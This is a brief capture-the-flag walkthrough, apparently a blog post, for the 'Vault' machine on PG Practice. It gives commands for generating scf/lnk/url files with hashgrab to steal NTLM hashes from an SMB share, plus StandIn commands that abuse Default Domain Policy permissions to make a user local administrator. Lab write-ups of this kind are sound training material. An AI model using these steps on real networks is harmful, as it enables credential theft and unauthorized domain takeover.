Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice
Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice
We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege escalations.
Notes
Creating scf/lnk/url files via hashgrab:
1
python3 ~/tools/hashgrab/hashgrab.py <ip> xct
GPO Abuse via standin:
1
2
3
4
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"
Other resources:
This post is licensed under CC BY 4.0 by the author.